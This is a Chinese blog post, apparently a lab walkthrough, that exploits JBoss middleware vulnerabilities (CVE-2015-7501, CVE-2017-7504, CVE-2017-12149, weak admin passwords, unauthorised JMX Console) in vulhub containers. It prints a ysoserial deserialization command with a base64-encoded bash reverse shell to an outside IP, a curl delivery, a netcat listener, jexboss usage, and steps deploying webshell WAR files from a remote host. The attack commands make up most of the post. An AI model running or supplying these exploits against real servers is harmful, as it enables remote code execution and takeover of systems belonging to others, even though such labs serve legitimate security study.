当前位置: 首页 > news >正文

中间件漏洞—Jboss

news 来源:原创 2025/5/3 18:37:42

一.CVE-2015-7501

 1.搭建服务

cd vulhub-master/jboss/JMXInvokerServlet-deserialization
docker-compose up -d

2.访问网站

3.访问该url出现如下页面,说明存在反序列化漏洞

47.108.150.249:8080/invoker/JMXInvokerServlet

4.准备好base64编码后反弹shell木马

5.下载 ysoserial ⼯具进⾏漏洞利⽤

java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDguMTUwLjI0OS82NjY2IDA+JjE=}|{base64,-d}|{bash,-i} ">exp.ser
curl http://47.108.150.249:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

6.成功监听nc -lvvp 6666

二.CVE-2017-7504

 1.搭建服务并访问网站

cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d

2.访问漏洞地址

jbossmq-httpil/HTTPServerILServlet

3.在kali中执行命令

python3 jexboss.py -u http://47.108.150.249:8080

成功getshell

三.CVE-2017-12149

 1.搭建服务

cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
并访问网站

2.该漏洞出现在/invoker/readonly中 ,服务器将⽤户post请求内容进⾏反序列化

返回500,说明⻚⾯存在,此⻚⾯存在反序列化漏洞

3.我们直接用工具连

并成功执行命令

四.Administration Console弱⼝令

 1.搭建服务

cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
访问网站,使用弱口令登录  admin vulhub
成功登录

2.点击web应⽤

上传后门 shell.war
该文件为存有木马的jsp文件压缩为zip文件后更改war后缀所得

3.在目录中可以看到我们上传的文件

4.尝试访问,可以访问到

5.复制文件的绝对路径,用哥斯拉进行连接

成功连接!!!

五.低版本JMX Console未授权

1.环境搭建

cd vulhub-master/jboss/CVE-2017-7504 
docker-compose up -d

访问页面

2.点击jboss.deployment中的这个

3.在这个位置部署war包

4.填写war包远程地址

http://47.108.150.249/cmd.war
跳转页面
5.尝试连接
连接成功
http://47.108.150.249/cmd/shell.jsp

六.高版本JMX Console未授权

1.环境搭建
cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
访问网站
2.点击如下链接
3. 填写远程war包地址进行远程部署
4. 搭建远程部署 , 部署远程war包地址
输⼊Invoke: http://47.108.150.249/cmd.war
5.使用哥斯拉进行连接
连接成功

相关文章:

  • 信号的漏桶实现
  • 神聖的綫性代數速成例題20. 廣義逆矩陣的概念與計算、線性空間上的雙線性函數及其性質、歐幾里得空間中正交投影的應用
  • 牛客周赛84 题解 Java ABCDE 仅供参考
  • Window对象与本地存储详解
  • 重装系统后遗症之zotero篇——zotero配置
  • 同旺科技USB to SPI 适配器 ---- 多适配器、多从机混合调试
  • 文件操作助手
  • 2025年渗透测试面试题总结-某360-企业蓝军面试复盘 (题目+回答)
  • 网站备份 工具,如何使用网站备份工具进行网站备份
  • MSIL入门
  • 测试用例`
  • 【橘子网络】关于网络分层以及协议的全局讲解
  • 小智物联网开发:为小智安装“机械臂“(其实就是加个舵机进行语音控制)
  • win32汇编环境,网络编程入门之九
  • 2025年了,5G还有三个新变化
  • unityAB包(2/2)
  • 性能测试笔记
  • asp.net进销存软件WEB进销存ERP软件库存玻璃行业
  • MySQL 5.7升级8.0报异常:处理新增关键字
  • [ACTF2020 新生赛]BackupFile-3.23BUUCTF练习day5(1)
  • 青海大学常务副校长(正厅级)任延明已任省卫健委党组书记
  • 首次面向上海、江苏招收本科生,西湖大学接连发布招生简章
  • 一周文化讲座|那些年的年青人
  • 2024年境内酒店住宿行业指标同比下滑:酒店行业传统增长模式面临挑战
  • 11家券商一季度净利翻番:9家利润超20亿,国泰海通居首
  • 增诉滥用职权罪,尹锡悦遭韩国检方追加起诉